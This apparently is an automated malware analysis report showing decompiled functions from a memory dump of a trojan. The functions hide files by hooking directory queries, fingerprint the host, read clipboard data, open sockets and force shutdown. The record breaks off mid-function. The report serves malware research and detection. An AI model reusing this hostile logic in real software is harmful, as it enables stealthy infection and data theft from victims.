    				void* __esi;
    				long _t45;
    				signed int _t51;
    				void* _t53;
    				signed int _t59;
    				signed int _t60;
    				void* _t61;
    				void* _t62;
    				union _FILE_INFORMATION_CLASS _t68;
    				void* _t69;
    				intOrPtr _t71;
    				char* _t74;
    				signed int* _t76;
    				void* _t78;
    				WCHAR* _t79;
    				signed int* _t80;
    
    				_t68 = _a32;
    				_t45 = NtQueryDirectoryFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _t68, _a36, _a40, _a44);
    				_a40 = _t45;
    				if(_t45 != 0 || _a24 == _t45 || _t68 != 1 && _t68 != 2 && _t68 != 3 && _t68 != 0xc) {
    					L31:
    					return _a40;
    				} else {
    					_a36 = _a36 & 0x00000000;
    					if(NtQueryObject(_a4, 1,  &_v1548, 0x400,  &_a36) != 0) {
    						goto L31;
    					}
    					_t79 =  *0x416778; // 0x0
    					_v1544[_v1548 & 0x0000ffff] = 0;
    					_t89 = _t79;
    					if(_t79 != 0) {
    						L11:
    						_t51 = lstrcmpiW(_t79, _v1544);
    						if(_t51 != 0) {
    							goto L31;
    						}
    						_a44 = _a44 & _t51;
    						_a4 = _a4 & _t51;
    						_t53 = _t68 - 1;
    						if(_t53 == 0) {
    							_a44 = 0x40;
    							L20:
    							_a4 = 0x3c;
    							L21:
    							_t69 = 0;
    							_t80 = 0;
    							do {
    								_t76 = _t80;
    								_t80 = _t69 + _a24;
    								if(E00405C44(_t80 + _a44,  *((intOrPtr*)(_t80 + _a4))) == 0) {
    									goto L26;
    								}
    								_t60 =  *_t80;
    								if(_t60 == 0) {
    									__eflags = _t76;
    									if(_t76 == 0) {
    										_a40 = 0xc000000f;
    									} else {
    										 *_t76 =  *_t76 & 0x00000000;
    									}
    									goto L31;
    								}
    								if(_t76 != 0) {
    									 *_t76 =  *_t76 + _t60;
    								}
    								L26:
    								_t59 =  *_t80;
    								_t69 = _t69 + _t59;
    							} while (_t59 > 0);
    							goto L31;
    						}
    						_t61 = _t53 - 1;
    						if(_t61 == 0) {
    							_a44 = 0x44;
    							goto L20;
    						}
    						_t62 = _t61 - 1;
    						if(_t62 == 0) {
    							_a44 = 0x5e;
    							goto L20;
    						} else {
    							if(_t62 == 9) {
    								_a44 = 0xc;
    								_a4 = 8;
    							}
    							goto L21;
    						}
    					} else {
    						E0040B798( &_v524, _t89);
    						_t79 = E0040F21C( &_v524);
    						 *0x416778 = _t79;
    						_t74 = 0x4161dd;
    						_t78 = 2;
    						do {
    							_t24 = _t74 - 1; // 0x30000
    							_t71 =  *0x416c34; // 0x25df5a8
    							 *_t74 = E0040F533( *((intOrPtr*)(_t71 + ( *_t24 & 0x000000ff) * 4)));
    							_t74 = _t74 + 2;
    							_t78 = _t78 - 1;
    						} while (_t78 != 0);
    						if(_t79 == 0) {
    							goto L31;
    						}
    						goto L11;
    					}
    				}
    			}

    APIs
    • NtQueryDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00405CBD
    • NtQueryObject.NTDLL(?,00000001,?,00000400,00000000), ref: 00405D08
    • lstrcmpiW.KERNEL32(00000000,?), ref: 00405D7D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Query$DirectoryFileObjectlstrcmpi
    • String ID: <$@
    • API String ID: 2113822959-1426351568
    • Opcode ID: c264a2b67adbd621dae690cdd7a4022101d423fa10c5deaf647d3dc51d0669e7
    • Instruction ID: b6fca0cbe9de38c8d840e2086eb3b0fd72afde187fa94daac946d15b6c8786cf
    • Opcode Fuzzy Hash: c264a2b67adbd621dae690cdd7a4022101d423fa10c5deaf647d3dc51d0669e7
    • Instruction Fuzzy Hash: 6E41CD32510A09ABDF218F58C888AEB7BA5FF48354F15813BFD44A7290D739C991CF98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00414BBB(signed int* __esi, signed int _a4) {
    				signed int _v12;
    				char _v13;
    				signed int _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				char _v36;
    				short _v72;
    				signed short _v74;
    				signed short _v76;
    				signed short _v78;
    				signed short _v80;
    				signed char _v86;
    				signed int _v88;
    				signed short _v90;
    				signed short _v92;
    				char _v288;
    				struct _OSVERSIONINFOW _v368;
    				short _v600;
    				void* __ebx;
    				void* __edi;
    				signed int _t73;
    				signed int _t76;
    				signed int _t77;
    				intOrPtr _t117;
    				signed int _t124;
    				signed int _t126;
    				intOrPtr _t138;
    				void* _t142;
    				void* _t143;
    				void* _t144;
    				void* _t145;
    				signed int* _t147;
    				void* _t148;
    
    				_t147 = __esi;
    				_t149 =  *__esi;
    				_t126 = 1;
    				_v13 = 0;
    				if( *__esi == 0) {
    					_t124 = E00414221(_t149);
    					 *__esi = _t124;
    					if(_t124 == 0) {
    						return 0;
    					}
    					_v13 = 1;
    				}
    				__eflags = _a4 & 0x00000001;
    				if((_a4 & 0x00000001) == 0) {
    					L9:
    					__eflags = _a4 & 0x00000002;
    					if((_a4 & 0x00000002) != 0) {
    						_push( &_v12);
    						_t145 = 4;
    						_v12 = 0x1020702;
    						_t126 = E00414234(_t147, 0x2713, _t133, _t145);
    					}
    					L11:
    					__eflags = _a4 & 0x00000004;
    					if((_a4 & 0x00000004) == 0) {
    						L16:
    						__eflags = _t126;
    						if(_t126 == 0) {
    							L29:
    							__eflags = _v13 - 1;
    							if(_v13 == 1) {
    								E0040F0C0( *_t147);
    								 *_t147 =  *_t147 & 0x00000000;
    								__eflags =  *_t147;
    							}
    							L31:
    							return _t126;
    						}
    						__eflags = _a4 & 0x00000008;
    						if((_a4 & 0x00000008) == 0) {
    							L20:
    							__eflags = _t126;
    							if(_t126 == 0) {
    								goto L29;
    							}
    							__eflags = _a4 & 0x00000010;
    							if((_a4 & 0x00000010) == 0) {
    								L28:
    								__eflags = _t126;
    								if(_t126 != 0) {
    									goto L31;
    								}
    								goto L29;
    							}
    							_t73 = GetModuleFileNameW(0,  &_v600, 0x103);
    							_v12 = _t73;
    							__eflags = _t73;
    							if(_t73 > 0) {
    								__eflags = 0;
    								 *((short*)(_t148 + _t73 * 2 - 0x254)) = 0;
    								_t126 = E004142A0(0, 0, _t147, 0x271e,  &_v600);
    							}
    							_v12 = 0x103;
    							__eflags = _t126;
    							if(_t126 == 0) {
    								goto L29;
    							} else {
    								_t76 =  *0x416c3c(2,  &_v600,  &_v12);
    								__eflags = _t76;
    								if(_t76 != 0) {
    									_t77 = _v12;
    									__eflags = _t77;
    									if(_t77 > 0) {
    										__eflags = 0;
    										 *((short*)(_t148 + _t77 * 2 - 0x254)) = 0;
    										_t126 = E004142A0(0, 0, _t147, 0x2721,  &_v600);
    									}
    								}
    								goto L28;
    							}
    						}
    						_v368.dwOSVersionInfoSize = 0x11c;
    						GetVersionExW( &_v368);
    						_v36 = _v368.dwMajorVersion;
    						_v32 = _v368.dwMinorVersion;
    						_v28 = _v368.dwBuildNumber;
    						_t137 = _v88 & 0x0000ffff;
    						_v24 = (_v90 & 0x0000ffff) << 0x00000010 | _v92 & 0x0000ffff;
    						_v20 = (_v86 & 0x000000ff) << 0x00000010 | _v88 & 0x0000ffff;
    						_push( &_v36);
    						_t142 = 0x14;
    						_t126 = E00414234(_t147, 0x271c, _v88 & 0x0000ffff, _t142);
    						__eflags = _t126;
    						if(_t126 == 0) {
    							goto L29;
    						}
    						_v12 =  *0x416eac() & 0x0000ffff;
    						_push( &_v12);
    						_t143 = 2;
    						_t126 = E00414234(_t147, 0x271d, _t137, _t143);
    						goto L20;
    					}
    					__eflags = _t126;
    					if(_t126 == 0) {
    						goto L29;
    					}
    					_v12 = E0040F18A();
    					_push( &_v12);
    					_t144 = 4;
    					_t126 = E00414234(_t147, 0x2719, _t133, _t144);
    					__eflags = _t126;
    					if(_t126 == 0) {
    						goto L29;
    					}
    					_v12 = E0040F1C9();
    					_t126 = E00414234(_t147, 0x271b, _t133, _t144,  &_v12);
    					__eflags = _t126;
    					if(_t126 == 0) {
    						goto L29;
    					}
    					_v12 = GetTickCount();
    					_t126 = E00414234(_t147, 0x271a, _t133, _t144,  &_v12);
    					goto L16;
    				}
    				_t138 =  *0x416df0; // 0x0
    				_t146 =  &_v288;
    				E0040F4BE(_t138,  &_v288);
    				_t117 =  *0x416c64; // 0x41b000
    				_t7 = _t117 + 8; // 0x0
    				_v80 =  *_t7 & 0x000000ff;
    				_t9 = _t117 + 9; // 0x80000000
    				_v78 =  *_t9 & 0x000000ff;
    				_t11 = _t117 + 0xa; // 0xee800000
    				_t133 =  *_t11 & 0x000000ff;
    				_v76 =  *_t11 & 0x000000ff;
    				_t13 = _t117 + 0xb; // 0x36ee8000
    				_v74 =  *_t13 & 0x000000ff;
    				_v72 = 0;
    				_t126 = E004142A0( *_t11 & 0x000000ff, __eflags, _t147, 0x2711, _t146);
    				__eflags = _t126;
    				if(_t126 == 0) {
    					goto L11;
    				}
    				__eflags = _v80;
    				if(__eflags != 0) {
    					_t126 = E004142A0(_t133, __eflags, _t147, 0x2712,  &_v80);
    				}
    				__eflags = _t126;
    				if(_t126 == 0) {
    					goto L11;
    				} else {
    					goto L9;
    				}
    			}

    APIs
    • GetTickCount.KERNEL32 ref: 00414CD4
    • GetVersionExW.KERNEL32(?,00000000,00000000), ref: 00414D12
    • GetUserDefaultUILanguage.KERNEL32(?), ref: 00414D70
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,00000000), ref: 00414DAE
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CountDefaultFileLanguageModuleNameTickUserVersion
    • String ID:
    • API String ID: 598021444-0
    • Opcode ID: 16eca74fc89336b586ebd37afff1e66e50bcedf69f557d7b955aad4f761d28f2
    • Instruction ID: 49abd19c16f38e815b90e7fad51a375ff233406b98e8aa06d008cb9afe5b29fd
    • Opcode Fuzzy Hash: 16eca74fc89336b586ebd37afff1e66e50bcedf69f557d7b955aad4f761d28f2
    • Instruction Fuzzy Hash: F961EB75A413496ADB11DBA8D844BEEBBF4AF45304F0440ABE944DB381E77C8AC9CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B798(WCHAR* __esi, void* __eflags) {
    				long _v8;
    				WCHAR* _v1028;
    				void _v1032;
    				void* _t22;
    
    				E0040B770(__esi);
    				_t22 = CreateFileW(__esi, 0x80000000, 3, 0, 3, 0x2000000, 0);
    				 *__esi = 0;
    				if(_t22 != 0xffffffff) {
    					_v8 = _v8 & 0;
    					if(NtQueryObject(_t22, 1,  &_v1032, 0x400,  &_v8) == 0 && _v1032 < 0x104) {
    						_v1028[_v1032 & 0x0000ffff] = 0;
    						lstrcpyW(__esi, _v1028);
    					}
    					return CloseHandle(_t22);
    				}
    				return 0;
    			}

    0x0040b7a4
    0x0040b7c2
    0x0040b7c6
    0x0040b7cc
    0x0040b7ce
    0x0040b7ec
    0x0040b80b
    0x0040b816
    0x0040b816
    0x00000000
    0x0040b81d
    0x0040b825

    APIs
      • Part of subcall function 0040B770: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00406408,?,025DF908), ref: 0040B791
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,02000000,00000000,?), ref: 0040B7BC
    • NtQueryObject.NTDLL(00000000,00000001,?,00000400,?), ref: 0040B7E4
    • lstrcpyW.KERNEL32(?,?), ref: 0040B816
    • CloseHandle.KERNEL32(00000000), ref: 0040B81D
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateFileFolderHandleObjectPathQuerySpeciallstrcpy
    • String ID:
    • API String ID: 2309192175-0
    • Opcode ID: 92decdcf104c79026c1ca96aaf6e02f4b5af6c2a7cf69c0697088bd49c7baa16
    • Instruction ID: 974b1f1183de7b1614eebe82c5495ab87078a998678a822f0778263a7167e9ee
    • Opcode Fuzzy Hash: 92decdcf104c79026c1ca96aaf6e02f4b5af6c2a7cf69c0697088bd49c7baa16
    • Instruction Fuzzy Hash: CF01F2B1600314A7E720AB64DC85FAA72BCEF44704F1080A6F702F61D1E7B49A828B9C
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000001,00000006), ref: 004105FB
    • bind.WS2_32(00000000,?,?), ref: 0041060E
    • listen.WS2_32(00000000,?), ref: 0041061D
    • closesocket.WS2_32(00000000), ref: 00410628
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    • Opcode ID: 7b85ef0401e2d4b256e0ac6150032e3f53cf9799cffa572d4f4f0c54fd6fa37e
    • Instruction ID: 2a162d66f975acf3ab08c7a23a54b4e3cebde95cbf575b336e71c9ff73e8f6c9
    • Opcode Fuzzy Hash: 7b85ef0401e2d4b256e0ac6150032e3f53cf9799cffa572d4f4f0c54fd6fa37e
    • Instruction Fuzzy Hash: C7E09231305120BACA212B65AC4CEDF7B68AF85771F028225F8A9D51E0D369C8E1C69C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00405F48(void* __ebp, signed int _a4) {
    				intOrPtr _v0;
    				void* _v4;
    				void* _v8;
    				void* __ecx;
    				void* __edi;
    				void* _t9;
    				intOrPtr _t12;
    				void* _t23;
    				void* _t25;
    				void* _t28;
    				int _t39;
    				void* _t42;
    				void* _t43;
    
    				_t42 = __ebp;
    				_t39 = _a4;
    				_t9 = GetClipboardData(_t39);
    				_t28 = _t9;
    				_v4 = _t28;
    				if(_t28 != 0 && (_t39 == 1 || _t39 == 0xd || _t39 == 7)) {
    					GlobalFix(_t28);
    					_t23 = _t9;
    					if(_t23 != 0) {
    						_a4 = _a4 & 0x00000000;
    						if(_t39 == 0xd) {
    							_push(_t42);
    							_t26 = _t23;
    							_t43 = E0040F533(_t23);
    							_t12 = E0040F47D(_t11, _t23);
    							_v0 = _t12;
    							if(_t12 != 0) {
    								_t40 = " ";
    								E00405E57(_t26, 1, " ");
    								if(_t43 != 0) {
    									E00405E57(_t26, _t43, _a4);
    								}
    								E00405E57(_t26, 1, _t40);
    							}
    						} else {
    							_t41 = " ";
    							E00405E57(_t25, 1, " ");
    							_t27 = _t23;
    							if(E0040F521(_t23) != 0) {
    								E00405E57(_t27, _t19, _t23);
    							}
    							E00405E57(_t27, 1, _t41);
    						}
    						E0040F0C0(_a4);
    						_t28 = _v8;
    						GlobalUnWire(_t28);
    					}
    				}
    				return _t28;
    			}

    0x00405f48
    0x00405f4a
    0x00405f50
    0x00405f56
    0x00405f58
    0x00405f5e
    0x00405f79
    0x00405f7f
    0x00405f83
    0x00405f89
    0x00405f91
    0x00405fbf
    0x00405fc0
    0x00405fc8
    0x00405fca
    0x00405fcf
    0x00405fd5
    0x00405fd7
    0x00405fe0
    0x00405fe7
    0x00405fef
    0x00405fef
    0x00405ff8
    0x00405ff8
    0x00405f93
    0x00405f93
    0x00405f9c
    0x00405fa1
    0x00405faa
    0x00405faf
    0x00405faf
    0x00405fb8
    0x00405fb8
    0x00406002
    0x00406007
    0x0040600c
    0x0040600c
    0x00406012
    0x00406018

    APIs
    • GetClipboardData.USER32(?), ref: 00405F50
    • GlobalFix.KERNEL32(00000000), ref: 00405F79
    • GlobalUnWire.KERNEL32(?), ref: 0040600C
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Global$ClipboardDataWire
    • String ID:
    • API String ID: 2697403597-0
    • Opcode ID: 8f0ff6350d98cab08660f04cd8c08460a9e90e0cf3a8989dee9195912e57e1e1
    • Instruction ID: a979775c61c09f8d603f94c935bbd7556576786c6e9fa69d0f39f89aa571b994
    • Opcode Fuzzy Hash: 8f0ff6350d98cab08660f04cd8c08460a9e90e0cf3a8989dee9195912e57e1e1
    • Instruction Fuzzy Hash: BB11063250471256C7203B269C48A7F6599CFC1364B06003FF999B32D1CF3CCC169EAA
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 00410914
    • bind.WS2_32(00000000,?,?), ref: 00410927
    • closesocket.WS2_32(00000000), ref: 00410932
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    • Opcode ID: 310005af9faf61fe6c97c76e4f86e90c5a8e174efb1e6be04dd20496bec820a0
    • Instruction ID: f2ca8ff3a07caf86e12ca5d5eaddf77f0ad93a0b04fb29f2f3b963221d450303
    • Opcode Fuzzy Hash: 310005af9faf61fe6c97c76e4f86e90c5a8e174efb1e6be04dd20496bec820a0
    • Instruction Fuzzy Hash: 7DE0C2313011307AD6202B79AC0DEDB7A58AF85B71B024725FE64E61F1D364CCC1CAA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C268() {
    				intOrPtr _v0;
    
    				E0041158D(L"SeShutdownPrivilege");
    				return ExitWindowsEx((0 | _v0 != 0x00000000) + 0x00000001 | 0x00000004, 0) & 0xffffff00 | _t11 != 0x00000000;
    			}

    0x0040c26d
    0x0040c28d

    APIs
      • Part of subcall function 0041158D: OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,00000000,0040B71D,SeDebugPrivilege), ref: 004115A2
      • Part of subcall function 0041158D: LookupPrivilegeValueW.ADVAPI32(00000000), ref: 004115C2
      • Part of subcall function 0041158D: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 004115D8
      • Part of subcall function 0041158D: GetLastError.KERNEL32 ref: 004115E2
      • Part of subcall function 0041158D: FindCloseChangeNotification.KERNELBASE(?), ref: 004115F1
    • ExitWindowsEx.USER32(00000001,00000000), ref: 0040C282
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$AdjustChangeCloseErrorExitFindLastLookupNotificationOpenPrivilegePrivilegesProcessValueWindows
    • String ID: SeShutdownPrivilege
    • API String ID: 1103692467-3733053543
    • Opcode ID: c615b6d400903ce37109fe8218cee52a06abed6ee0ce5b1429362934808d4e50
    • Instruction ID: fb4196973f3b5a490a35593853b61c08d9d438a744ee0b699e5c8e0c693b5694
    • Opcode Fuzzy Hash: c615b6d400903ce37109fe8218cee52a06abed6ee0ce5b1429362934808d4e50
    • Instruction Fuzzy Hash: C7C0805075534175F20027710E0678F159D4B50B54F05CC3B7143D1091C42CC5609135
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • select.WS2_32(00000000,?,00000000,00000000,0000000C), ref: 0041051A
    • recv.WS2_32(0000000C,00000000,?,00000000), ref: 00410532
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: recvselect
    • String ID:
    • API String ID: 741273618-0
    • Opcode ID: 0c64d64840408cf9034cce54cdce863c200e9d442939e634d4933789ce04ab68
    • Instruction ID: 55d6b81a786bfd976c474ad530761da75a775ec14bf99daa55d652bf5fac1638
    • Opcode Fuzzy Hash: 0c64d64840408cf9034cce54cdce863c200e9d442939e634d4933789ce04ab68
    • Instruction Fuzzy Hash: E4016D71900208AFDB05DF68DCC5AEE7BBEFB55304F00C56AA515D6180D6B89AC08F50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00414AEA() {
    				void* _t1;
    
    				E0040F173(_t1, 0x417680, 0, 0x24);
    				if(InitializeSecurityDescriptor(0x41768c, 1) != 0 && SetSecurityDescriptorDacl(0x41768c, 1, 0, 0) != 0) {
    					 *0x417688 =  *0x417688 & 0x00000000;
    					 *0x417680 = 0xc;
    					 *0x417684 = 0x41768c;
    				}
    				return 1;
    			}

    0x00414af4
    0x00414b09
    0x00414b1c
    0x00414b23
    0x00414b2d
    0x00414b2d
    0x00414b36

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(0041768C,00000001,00417680,00000000,00000024,?,0040B5EE), ref: 00414B01
    • SetSecurityDescriptorDacl.ADVAPI32(0041768C,00000001,00000000,00000000,?,0040B5EE), ref: 00414B12
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: DescriptorSecurity$DaclInitialize
    • String ID:
    • API String ID: 625223987-0
    • Opcode ID: 38bdc0f5bbf64d3af3f85f51fdcb23ed92a622ac397bc55bef86f0d9f1f218e3
    • Instruction ID: daa61969469bf381f2ae4d96f20dc0914e16a31f6642663e1bd52fe2bd73324c
    • Opcode Fuzzy Hash: 38bdc0f5bbf64d3af3f85f51fdcb23ed92a622ac397bc55bef86f0d9f1f218e3
    • Instruction Fuzzy Hash: F9E04F303DAB1066E7201F19BC0AFC73A649B00B25F12403AF204692D0D7FD9881969C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00405B6F(intOrPtr _a4, short* _a8, intOrPtr _a12, intOrPtr* _a16) {
    				intOrPtr _t10;
    				intOrPtr _t13;
    				void* _t15;
    				intOrPtr _t16;
    				short* _t17;
    				void* _t18;
    				void* _t19;
    
    				_t17 = _a8;
    				_t16 = _a4;
    				_t18 = _t16 -  *0x416c54; // 0x70950000
    				if(_t18 == 0) {
    					L2:
    					if(_t17 == 0) {
    						L4:
    						_t13 = 0;
    						L5:
    						if(_t17 == 0) {
    							L8:
    							_t9 = 0;
    							L9:
    							_t10 = E00407619(_t13, _t15, _t16, _t9, _a12, _t13);
    							if(_t10 == 0) {
    								return  *0x416cf4(_t16, _t17, _a12, _a16);
    							}
    							 *_a16 = _t10;
    							return 0;
    						}
    						_t9 =  *((intOrPtr*)(_t17 + 4));
    						if( *((intOrPtr*)(_t17 + 4)) == 0 ||  *_t17 <= 0) {
    							goto L8;
    						} else {
    							goto L9;
    						}
    					}
    					_t13 =  *((intOrPtr*)(_t17 + 4));
    					goto L5;
    				}
    				_t19 = _t16 -  *0x416d88; // 0x75300000
    				if(_t19 != 0) {
    					goto L4;
    				}
    				goto L2;
    			}

    0x00405b73
    0x00405b77
    0x00405b7a
    0x00405b80
    0x00405b8a
    0x00405b8c
    0x00405b93
    0x00405b93
    0x00405b95
    0x00405b97
    0x00405ba6
    0x00405ba6
    0x00405ba8
    0x00405bae
    0x00405bb5
    0x00000000
    0x00405bc8
    0x00405bba
    0x00000000
    0x00405bbc
    0x00405b99
    0x00405b9e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405b9e
    0x00405b8e
    0x00000000
    0x00405b8e
    0x00405b82
    0x00405b88
    0x00000000
    0x00000000
    0x00000000

    APIs
    • LdrGetProcedureAddress.NTDLL(?,?,?,?), ref: 00405BC8
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProcedure
    • String ID:
    • API String ID: 3653107232-0
    • Opcode ID: ec4f7c8eb7ccf22d201d19830f1b5d668262a0832b0d41f37a3c22242886ed26
    • Instruction ID: a2358e1ada1fb45ea4183a9006e5cd8bf08a8af6798f7291db2c34c81f8e8fa3
    • Opcode Fuzzy Hash: ec4f7c8eb7ccf22d201d19830f1b5d668262a0832b0d41f37a3c22242886ed26
    • Instruction Fuzzy Hash: 21018632601A15ABCB219F54DD0097B77B9EF80750709483AFC05A7280D778FC10DFA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F1C9() {
    				long _t7;
    				signed int _t8;
    				intOrPtr _t9;
    				void* _t12;
    				void* _t14;
    
    				_t12 = _t14 - 0x78;
    				_t7 = GetTimeZoneInformation(_t12 - 0x34);
    				if(_t7 != 1) {
    					if(_t7 != 2) {
    						_t8 = 0;
    					} else {
    						_t9 =  *((intOrPtr*)(_t12 + 0x74));
    						goto L4;
    					}
    				} else {
    					_t9 =  *((intOrPtr*)(_t12 + 0x20));
    					L4:
    					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
    				}
    				return _t8;
    			}

    0x0040f1ca
    0x0040f1d8
    0x0040f1e1
    0x0040f1eb
    0x0040f1fa
    0x0040f1ed
    0x0040f1ed
    0x00000000
    0x0040f1ed
    0x0040f1e3
    0x0040f1e3
    0x0040f1f0
    0x0040f1f5
    0x0040f1f5
    0x0040f200

    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 0040F1D8
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: 8a05c317de1b158e3180cbb6e5704087a935c7be60a80a93202687f8cfdda6df
    • Instruction ID: d77e428eff7c9fe66bcd79913e57865555d9b076c2ab45fe37091f3f7610ca66
    • Opcode Fuzzy Hash: 8a05c317de1b158e3180cbb6e5704087a935c7be60a80a93202687f8cfdda6df
    • Instruction Fuzzy Hash: 62E04F30644108CBDB34DBA4DE4189D77A9AB05314F300536E402FA280D62CDE4E9A06
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E004096D8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr _t6;
    				void* _t9;
    				void* _t10;
    				void* _t12;
    
    				_t6 = _a8;
    				if( *0x418080 != 0xffffffff) {
    					L3:
    					return  *0x416ab8(_a4, _t6, _a12, _a16);
    				}
    				_t12 = _t6 -  *0x416a10; // 0x0
    				if(_t12 != 0) {
    					goto L3;
    				}
    				return E00409430(_t9, _t10, _a4);
    			}

    0x004096e2
    0x004096e5
    0x004096f9
    0x00000000
    0x00409703
    0x004096e7
    0x004096ed
    0x00000000
    0x00000000
    0x00000000

    APIs
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00409703
      • Part of subcall function 00409430: RtlEnterCriticalSection.NTDLL(00416A34), ref: 00409441
      • Part of subcall function 00409430: GetWindowInfo.USER32(?,?), ref: 00409462
      • Part of subcall function 00409430: SelectObject.GDI32(00000000), ref: 0040952C
      • Part of subcall function 00409430: GetCurrentThreadId.KERNEL32 ref: 0040955E
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Window$CriticalCurrentEnterInfoNtdllObjectProc_SectionSelectThread
    • String ID:
    • API String ID: 449601525-0
    • Opcode ID: f6e22ed84a5f80525afb4bc47cee31e8a34fde99d01d2a0daacedfed01a4366c
    • Instruction ID: 4737f9f0c64fbcd1014066bf88af9a11bc940a9183b5ce9035b713f7c28c8dbc
    • Opcode Fuzzy Hash: f6e22ed84a5f80525afb4bc47cee31e8a34fde99d01d2a0daacedfed01a4366c
    • Instruction Fuzzy Hash: A8E0EC3100010DEBCF11EF54EC409AA3B69BB05360B01CA36F925655B2CB369C61EB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E004102DA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				unsigned int _t67;
    				signed int _t68;
    				intOrPtr _t71;
    				void* _t79;
    				signed int _t81;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				signed int _t98;
    				signed int _t99;
    				signed int _t100;
    				signed int _t101;
    				signed int _t102;
    				unsigned int _t103;
    				signed int _t104;
    				signed int _t106;
    				signed int _t108;
    				signed int _t111;
    				signed int _t115;
    				signed int _t116;
    				intOrPtr* _t119;
    				unsigned int _t125;
    				signed int _t126;
    				signed int _t128;
    
    				_t71 = _a4;
    				_t98 = 0;
    				_t99 = 0;
    				_v16 = 0;
    				_v20 = 1;
    				L1:
    				while(1) {
    					if(_t99 <= 0) {
    						_t103 =  *(_t98 + _t71);
    						_t98 = _t98 + 4;
    						_t99 = 0x1f;
    						_t104 = _t103 >> 0x1f;
    					} else {
    						_t99 = _t99 - 1;
    						_t104 = _t67 >> _t99 & 0x00000001;
    					}
    					if(_t104 != 0) {
    						_v16 = _v16 + 1;
    						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
    						_t98 = _t98 + 1;
    						L6:
    						_t71 = _a4;
    						continue;
    					}
    					_v12 = 1;
    					do {
    						if(_t99 <= 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t100 = 0x1f;
    							_t106 = _t67 >> 0x1f;
    						} else {
    							_t100 = _t99 - 1;
    							_t106 = _t67 >> _t100 & 0x00000001;
    						}
    						_v12 = _t106 + _v12 * 2;
    						if(_t100 <= 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t99 = 0x1f;
    							_t108 = _t67 >> 0x1f;
    						} else {
    							_t99 = _t100 - 1;
    							_t108 = _t67 >> _t99 & 0x00000001;
    						}
    					} while (_t108 == 0);
    					_t111 = _v12;
    					if(_t111 == 2) {
    						_t81 = _v20;
    						L19:
    						_v12 = _t81;
    						if(_t99 <= 0) {
    							_t67 =  *(_t98 + _t71);
    							_t98 = _t98 + 4;
    							_t101 = 0x1f;
    							_v8 = _t67 >> 0x1f;
    						} else {
    							_t101 = _t99 - 1;
    							_v8 = _t67 >> _t101 & 0x00000001;
    						}
